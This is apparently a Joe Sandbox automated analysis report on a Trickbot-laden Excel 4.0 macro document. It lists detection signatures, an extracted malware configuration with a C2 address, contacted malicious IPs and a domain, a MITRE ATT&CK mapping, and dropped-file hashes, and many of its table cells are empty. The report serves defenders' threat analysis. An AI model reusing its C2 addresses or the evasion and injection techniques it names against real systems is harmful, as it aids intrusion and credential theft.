Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls) |
Analysis ID: | 355606 |
MD5: | 31964397103260697c37ee4237194da9 |
SHA1: | 7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94 |
SHA256: | 12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4 |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 Trickbot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"gtag": "rob60", "C2 list": ["200.52.147.93:443"], "modules": ["pwgrab", "mcconf"]}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
Click to see the 1 entries |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Yara detected Trickbot | Show sources |
Source: | File source: |
Source: | Code function: |
Compliance: |
---|
Uses insecure TLS / SSL version for HTTPS connection | Show sources |
Source: | HTTPS traffic detected: |
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
C2 URLs / IPs found in malware configuration | Show sources |
Source: | IPs: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
E-Banking Fraud: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) | Show sources |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements | Show sources |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: |
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: |
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | System Network Configuration Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol113 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Metadefender | Browse | ||
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
11% | Metadefender | Browse | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
5% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
chipmania.it | 185.81.0.78 | true | false |
| unknown |
www.chipmania.it | unknown | unknown | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.202.191.164 | unknown | Reserved | 398019 | DYNUUS | true | |
108.170.20.75 | unknown | United States | 20454 | SSASN2US | true | |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355606 |
Start date: | 20.02.2021 |
Start time: | 03:16:16 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/11@1/4 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
03:16:38 | API Interceptor | |
03:16:38 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
142.202.191.164 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
108.170.20.75 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
185.81.0.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DYNUUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
RedesyTelecomunicacionesHN | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SSASN2US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SERVERPLAN-ASIT | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8c4a22651d328568ec66382a84fc505f | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.078657124509345 |
Encrypted: | false |
SSDEEP: | 6:kK7APbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:DAW3kPlE99SNxAhUeo+aKt |
MD5: | 76C4F94E3F31035415F533015971BE6E |
SHA1: | C7A8552A39CA176E310DCAFCF2D198808FCE970D |
SHA-256: | 2341CC65476F6D7FAEA43753B543EFF7DDC8CEB07F2DA3D8C33D695B24D8688C |
SHA-512: | 066B27D84C6FD5A717D377649DCE5534749D1F15DA2E4A73B9D5B0715029A7E8B64ADE266D2369D7C5DA9B62986B90BD2856A2A85AEFE3093931972FE5645883 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
